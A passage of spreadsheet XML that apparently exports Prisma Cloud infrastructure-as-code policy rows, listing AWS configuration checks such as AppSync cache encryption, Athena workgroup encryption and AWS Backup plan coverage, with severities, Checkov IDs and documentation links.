      <c r="A698" t="inlineStr"/>
      <c r="B698" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C698" s="2" t="inlineStr"/>
      <c r="D698" t="inlineStr"/>
      <c r="E698" t="inlineStr"/>
      <c r="F698" t="inlineStr"/>
      <c r="G698" t="b">
        <v>1</v>
      </c>
      <c r="H6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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J698" t="inlineStr">
        <is>
          <t>IaC:General:aws-appsync</t>
        </is>
      </c>
      <c r="K698" t="inlineStr">
        <is>
          <t>AWS Appsync API Cache is not encrypted at rest</t>
        </is>
      </c>
      <c r="L698" t="inlineStr"/>
      <c r="M698" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N698" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O698" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P698" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q698" t="inlineStr"/>
      <c r="R698" t="inlineStr"/>
      <c r="S698" t="inlineStr"/>
      <c r="T698" t="b">
        <v>0</v>
      </c>
      <c r="U698" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V698" t="inlineStr">
        <is>
          <t>IaC:General:aws-appsync-api-cache</t>
        </is>
      </c>
      <c r="W698" t="inlineStr">
        <is>
          <t>Ensure Appsync API Cache is encrypted at rest</t>
        </is>
      </c>
      <c r="X698" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-at-rest</t>
        </is>
      </c>
      <c r="Y698" t="inlineStr"/>
      <c r="Z698" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_appsync_api_cache"]}</t>
        </is>
      </c>
      <c r="AA698" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB698" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC698" t="inlineStr">
        <is>
          <t>CKV_AWS_214</t>
        </is>
      </c>
      <c r="AD698" t="b">
        <v>1</v>
      </c>
      <c r="AE698" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF698" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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8" t="inlineStr">
        <is>
          <t>f8d70949-c727-4d47-8570-a428519a8d0e</t>
        </is>
      </c>
      <c r="AI698" t="inlineStr"/>
      <c r="AJ698" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK698" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" t="inlineStr"/>
      <c r="B699" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C699" s="2" t="inlineStr"/>
      <c r="D699" t="inlineStr"/>
      <c r="E699" t="inlineStr"/>
      <c r="F699" t="inlineStr"/>
      <c r="G699" t="b">
        <v>1</v>
      </c>
      <c r="H6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699" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J699" t="inlineStr">
        <is>
          <t>IaC:General:aws-appsync</t>
        </is>
      </c>
      <c r="K699" t="inlineStr">
        <is>
          <t>AWS Appsync API Cache is not encrypted in transit</t>
        </is>
      </c>
      <c r="L699" t="inlineStr"/>
      <c r="M699" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N699" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O699" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P699" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q699" t="inlineStr"/>
      <c r="R699" t="inlineStr"/>
      <c r="S699" t="inlineStr"/>
      <c r="T699" t="b">
        <v>0</v>
      </c>
      <c r="U699" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V699" t="inlineStr">
        <is>
          <t>IaC:General:aws-appsync-api-cache</t>
        </is>
      </c>
      <c r="W699" t="inlineStr">
        <is>
          <t>Ensure Appsync API Cache is encrypted in transit</t>
        </is>
      </c>
      <c r="X699" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-in-transit</t>
        </is>
      </c>
      <c r="Y699" t="inlineStr"/>
      <c r="Z699" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_appsync_api_cache"]}</t>
        </is>
      </c>
      <c r="AA699" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB699" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC699" t="inlineStr">
        <is>
          <t>CKV_AWS_215</t>
        </is>
      </c>
      <c r="AD699" t="b">
        <v>1</v>
      </c>
      <c r="AE699" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF699" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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699" t="inlineStr">
        <is>
          <t>91724d30-a293-4db3-bf5d-1a6dd04c6412</t>
        </is>
      </c>
      <c r="AI699" t="inlineStr"/>
      <c r="AJ699" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK699" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" t="inlineStr"/>
      <c r="B700" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C700" s="2" t="inlineStr"/>
      <c r="D700" t="inlineStr"/>
      <c r="E700" t="inlineStr"/>
      <c r="F700" t="inlineStr"/>
      <c r="G700" t="b">
        <v>1</v>
      </c>
      <c r="H7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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J700" t="inlineStr">
        <is>
          <t>IaC:General:aws-appsync</t>
        </is>
      </c>
      <c r="K700" t="inlineStr">
        <is>
          <t>AWS AppSync is not protected by WAF</t>
        </is>
      </c>
      <c r="L700" t="inlineStr"/>
      <c r="M700" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N700" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O700" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P700" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q700" t="inlineStr"/>
      <c r="R700" t="inlineStr"/>
      <c r="S700" t="inlineStr"/>
      <c r="T700" t="b">
        <v>0</v>
      </c>
      <c r="U700" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V700" t="inlineStr">
        <is>
          <t>IaC:General:aws-appsync-graphql-api</t>
        </is>
      </c>
      <c r="W700" t="inlineStr">
        <is>
          <t>Ensure AppSync is protected by WAF</t>
        </is>
      </c>
      <c r="X700" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-is-protected-by-waf</t>
        </is>
      </c>
      <c r="Y700" t="inlineStr"/>
      <c r="Z700" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_appsync_graphql_api"]}</t>
        </is>
      </c>
      <c r="AA700" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB700" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC700" t="inlineStr">
        <is>
          <t>CKV2_AWS_33</t>
        </is>
      </c>
      <c r="AD700" t="b">
        <v>1</v>
      </c>
      <c r="AE700" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF700" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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0" t="inlineStr">
        <is>
          <t>a95d3ca6-f16e-42b8-929f-efb0f8f24f15</t>
        </is>
      </c>
      <c r="AI700" t="inlineStr"/>
      <c r="AJ700" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK700" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" t="inlineStr"/>
      <c r="B701" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C701" s="2" t="inlineStr"/>
      <c r="D701" t="inlineStr"/>
      <c r="E701" t="inlineStr"/>
      <c r="F701" t="inlineStr"/>
      <c r="G701" t="b">
        <v>1</v>
      </c>
      <c r="H7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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J701" t="inlineStr">
        <is>
          <t>IaC:General:aws-athena</t>
        </is>
      </c>
      <c r="K701" t="inlineStr">
        <is>
          <t>Athena Database is not encrypted at rest</t>
        </is>
      </c>
      <c r="L701" t="inlineStr"/>
      <c r="M701" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N701" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O701" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P701" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q701" t="inlineStr"/>
      <c r="R701" t="inlineStr"/>
      <c r="S701" t="inlineStr"/>
      <c r="T701" t="b">
        <v>0</v>
      </c>
      <c r="U701" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V701" t="inlineStr">
        <is>
          <t>IaC:General:aws-athena-database</t>
        </is>
      </c>
      <c r="W701" t="inlineStr">
        <is>
          <t>Ensure Athena Database is encrypted at rest</t>
        </is>
      </c>
      <c r="X701" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-29</t>
        </is>
      </c>
      <c r="Y701" t="inlineStr"/>
      <c r="Z701" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_athena_database"]}</t>
        </is>
      </c>
      <c r="AA701" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB701" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC701" t="inlineStr">
        <is>
          <t>CKV_AWS_77</t>
        </is>
      </c>
      <c r="AD701" t="b">
        <v>1</v>
      </c>
      <c r="AE701" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF701" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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1" t="inlineStr">
        <is>
          <t>0f8ad1a1-47e9-4336-a582-2d6dcf63bf95</t>
        </is>
      </c>
      <c r="AI701" t="inlineStr"/>
      <c r="AJ701" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK701" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" t="inlineStr"/>
      <c r="B702" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C702" s="2" t="inlineStr"/>
      <c r="D702" t="inlineStr"/>
      <c r="E702" t="inlineStr"/>
      <c r="F702" t="inlineStr"/>
      <c r="G702" t="b">
        <v>1</v>
      </c>
      <c r="H7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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J702" t="inlineStr">
        <is>
          <t>IaC:General:aws-athena</t>
        </is>
      </c>
      <c r="K702" t="inlineStr">
        <is>
          <t>Athena Workgroup is not encrypted</t>
        </is>
      </c>
      <c r="L702" t="inlineStr"/>
      <c r="M702" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N702" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O702" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P702" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q702" t="inlineStr"/>
      <c r="R702" t="inlineStr"/>
      <c r="S702" t="inlineStr"/>
      <c r="T702" t="b">
        <v>0</v>
      </c>
      <c r="U702" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V702" t="inlineStr">
        <is>
          <t>IaC:General:aws-athena-workgroup</t>
        </is>
      </c>
      <c r="W702" t="inlineStr">
        <is>
          <t>Ensure that Athena Workgroup is encrypted</t>
        </is>
      </c>
      <c r="X702" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-athena-workgroup-is-encrypted</t>
        </is>
      </c>
      <c r="Y702" t="inlineStr"/>
      <c r="Z702" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_athena_workgroup"]}</t>
        </is>
      </c>
      <c r="AA702" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB702" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC702" t="inlineStr">
        <is>
          <t>CKV_AWS_159</t>
        </is>
      </c>
      <c r="AD702" t="b">
        <v>1</v>
      </c>
      <c r="AE702" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF702" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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2" t="inlineStr">
        <is>
          <t>c3e76d91-fea7-4744-8766-9f239e3934fd</t>
        </is>
      </c>
      <c r="AI702" t="inlineStr"/>
      <c r="AJ702" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK702" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" t="inlineStr"/>
      <c r="B703" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C703" s="2" t="inlineStr"/>
      <c r="D703" t="inlineStr"/>
      <c r="E703" t="inlineStr"/>
      <c r="F703" t="inlineStr"/>
      <c r="G703" t="b">
        <v>1</v>
      </c>
      <c r="H7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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J703" t="inlineStr">
        <is>
          <t>IaC:General:aws-athena</t>
        </is>
      </c>
      <c r="K703" t="inlineStr">
        <is>
          <t>Athena workgroup does not prevent disabling encryption</t>
        </is>
      </c>
      <c r="L703" t="inlineStr"/>
      <c r="M703" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N703" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O703" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P703" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q703" t="inlineStr"/>
      <c r="R703" t="inlineStr"/>
      <c r="S703" t="inlineStr"/>
      <c r="T703" t="b">
        <v>0</v>
      </c>
      <c r="U703" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V703" t="inlineStr">
        <is>
          <t>IaC:General:aws-athena-workgroup</t>
        </is>
      </c>
      <c r="W703" t="inlineStr">
        <is>
          <t>Ensure Athena Workgroup enforces configuration to prevent client disabling encryption</t>
        </is>
      </c>
      <c r="X703" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-33</t>
        </is>
      </c>
      <c r="Y703" t="inlineStr"/>
      <c r="Z703" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_athena_workgroup"]}</t>
        </is>
      </c>
      <c r="AA703" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB703" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC703" t="inlineStr">
        <is>
          <t>CKV_AWS_82</t>
        </is>
      </c>
      <c r="AD703" t="b">
        <v>1</v>
      </c>
      <c r="AE703" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF703" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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3" t="inlineStr">
        <is>
          <t>e185eb37-795d-4cbc-84ac-e9f1cfa99739</t>
        </is>
      </c>
      <c r="AI703" t="inlineStr"/>
      <c r="AJ703" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK703" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" t="inlineStr"/>
      <c r="B704" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C704" s="2" t="inlineStr"/>
      <c r="D704" t="inlineStr"/>
      <c r="E704" t="inlineStr"/>
      <c r="F704" t="inlineStr"/>
      <c r="G704" t="b">
        <v>1</v>
      </c>
      <c r="H7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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J704" t="inlineStr">
        <is>
          <t>IaC:General:aws-autoscaling</t>
        </is>
      </c>
      <c r="K704" t="inlineStr">
        <is>
          <t>EC2 Auto Scaling groups are not utilizing EC2 launch templates</t>
        </is>
      </c>
      <c r="L704" t="inlineStr"/>
      <c r="M704" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N704" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O704" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P704" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q704" t="inlineStr"/>
      <c r="R704" t="inlineStr"/>
      <c r="S704" t="inlineStr"/>
      <c r="T704" t="b">
        <v>0</v>
      </c>
      <c r="U704" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V704" t="inlineStr">
        <is>
          <t>IaC:General:aws-autoscaling-group</t>
        </is>
      </c>
      <c r="W704" t="inlineStr">
        <is>
          <t>Ensure EC2 Auto Scaling groups use EC2 launch templates</t>
        </is>
      </c>
      <c r="X704" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-315</t>
        </is>
      </c>
      <c r="Y704" t="inlineStr"/>
      <c r="Z704" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_autoscaling_group"]}</t>
        </is>
      </c>
      <c r="AA704" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB704" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC704" t="inlineStr">
        <is>
          <t>CKV_AWS_315</t>
        </is>
      </c>
      <c r="AD704" t="b">
        <v>1</v>
      </c>
      <c r="AE704" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF704" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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4" t="inlineStr">
        <is>
          <t>2ec76f1c-a3cc-4d17-a304-dd71a22c8fb8</t>
        </is>
      </c>
      <c r="AI704" t="inlineStr"/>
      <c r="AJ704" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK704" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" t="inlineStr"/>
      <c r="B705" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C705" s="2" t="inlineStr"/>
      <c r="D705" t="inlineStr"/>
      <c r="E705" t="inlineStr"/>
      <c r="F705" t="inlineStr"/>
      <c r="G705" t="b">
        <v>1</v>
      </c>
      <c r="H7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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J705" t="inlineStr">
        <is>
          <t>IaC:General:aws-autoscaling</t>
        </is>
      </c>
      <c r="K705" t="inlineStr">
        <is>
          <t>Autoscaling groups did not supply tags to launch configurations</t>
        </is>
      </c>
      <c r="L705" t="inlineStr"/>
      <c r="M705" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N705" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O705" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P705" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q705" t="inlineStr"/>
      <c r="R705" t="inlineStr"/>
      <c r="S705" t="inlineStr"/>
      <c r="T705" t="b">
        <v>0</v>
      </c>
      <c r="U705" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V705" t="inlineStr">
        <is>
          <t>IaC:General:aws-autoscaling-group</t>
        </is>
      </c>
      <c r="W705" t="inlineStr">
        <is>
          <t>Autoscaling groups should supply tags to launch configurations</t>
        </is>
      </c>
      <c r="X705" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/autoscaling-groups-should-supply-tags-to-launch-configurations</t>
        </is>
      </c>
      <c r="Y705" t="inlineStr"/>
      <c r="Z705" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_autoscaling_group"]}</t>
        </is>
      </c>
      <c r="AA705" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB705" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC705" t="inlineStr">
        <is>
          <t>CKV_AWS_153</t>
        </is>
      </c>
      <c r="AD705" t="b">
        <v>1</v>
      </c>
      <c r="AE705" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF705" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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5" t="inlineStr">
        <is>
          <t>660b9b45-f88a-476f-a1f8-292f9e284bd6</t>
        </is>
      </c>
      <c r="AI705" t="inlineStr"/>
      <c r="AJ705" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK705" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" t="inlineStr"/>
      <c r="B706" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C706" s="2" t="inlineStr"/>
      <c r="D706" t="inlineStr"/>
      <c r="E706" t="inlineStr"/>
      <c r="F706" t="inlineStr"/>
      <c r="G706" t="b">
        <v>1</v>
      </c>
      <c r="H7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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J706" t="inlineStr">
        <is>
          <t>IaC:General:aws-backup</t>
        </is>
      </c>
      <c r="K706" t="inlineStr">
        <is>
          <t>EBS does not have an AWS Backup backup plan</t>
        </is>
      </c>
      <c r="L706" t="inlineStr"/>
      <c r="M706" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N706" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O706" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P706" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q706" t="inlineStr"/>
      <c r="R706" t="inlineStr"/>
      <c r="S706" t="inlineStr"/>
      <c r="T706" t="b">
        <v>0</v>
      </c>
      <c r="U706" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V706" t="inlineStr">
        <is>
          <t>IaC:General:aws-backup-selection</t>
        </is>
      </c>
      <c r="W706" t="inlineStr">
        <is>
          <t>Ensure that EBS are added in the backup plans of AWS Backup</t>
        </is>
      </c>
      <c r="X706" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-ebs-are-added-in-the-backup-plans-of-aws-backup</t>
        </is>
      </c>
      <c r="Y706" t="inlineStr"/>
      <c r="Z706" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_backup_selection"]}</t>
        </is>
      </c>
      <c r="AA706" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB706" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC706" t="inlineStr">
        <is>
          <t>CKV2_AWS_9</t>
        </is>
      </c>
      <c r="AD706" t="b">
        <v>1</v>
      </c>
      <c r="AE706" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF706" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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6" t="inlineStr">
        <is>
          <t>b0e87216-6fd3-4492-8597-fac85e60fc21</t>
        </is>
      </c>
      <c r="AI706" t="inlineStr"/>
      <c r="AJ706" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK706" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" t="inlineStr"/>
      <c r="B707" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C707" s="2" t="inlineStr"/>
      <c r="D707" t="inlineStr"/>
      <c r="E707" t="inlineStr"/>
      <c r="F707" t="inlineStr"/>
      <c r="G707" t="b">
        <v>1</v>
      </c>
      <c r="H7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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J707" t="inlineStr">
        <is>
          <t>IaC:General:aws-backup</t>
        </is>
      </c>
      <c r="K707" t="inlineStr">
        <is>
          <t>Amazon EFS does not have an AWS Backup backup plan</t>
        </is>
      </c>
      <c r="L707" t="inlineStr"/>
      <c r="M707" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N707" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O707" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P707" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q707" t="inlineStr"/>
      <c r="R707" t="inlineStr"/>
      <c r="S707" t="inlineStr"/>
      <c r="T707" t="b">
        <v>0</v>
      </c>
      <c r="U707" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V707" t="inlineStr">
        <is>
          <t>IaC:General:aws-backup-selection</t>
        </is>
      </c>
      <c r="W707" t="inlineStr">
        <is>
          <t>Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup</t>
        </is>
      </c>
      <c r="X707" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-elastic-file-system-amazon-efs-file-systems-are-added-in-the-backup-plans-of-aws-backup</t>
        </is>
      </c>
      <c r="Y707" t="inlineStr"/>
      <c r="Z707" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_backup_selection"]}</t>
        </is>
      </c>
      <c r="AA707" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB707" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC707" t="inlineStr">
        <is>
          <t>CKV2_AWS_18</t>
        </is>
      </c>
      <c r="AD707" t="b">
        <v>1</v>
      </c>
      <c r="AE707" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF707" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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7" t="inlineStr">
        <is>
          <t>9cd1290f-75fa-4b19-a1bd-d616d0753e54</t>
        </is>
      </c>
      <c r="AI707" t="inlineStr"/>
      <c r="AJ707" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK707" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" t="inlineStr"/>
      <c r="B708" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C708" s="2" t="inlineStr"/>
      <c r="D708" t="inlineStr"/>
      <c r="E708" t="inlineStr"/>
      <c r="F708" t="inlineStr"/>
      <c r="G708" t="b">
        <v>1</v>
      </c>
      <c r="H7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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J708" t="inlineStr">
        <is>
          <t>IaC:General:aws-backup</t>
        </is>
      </c>
      <c r="K708" t="inlineStr">
        <is>
          <t>Backup Vault is not encrypted at rest using KMS CMK</t>
        </is>
      </c>
      <c r="L708" t="inlineStr"/>
      <c r="M708" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N708" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O708" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P708" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q708" t="inlineStr"/>
      <c r="R708" t="inlineStr"/>
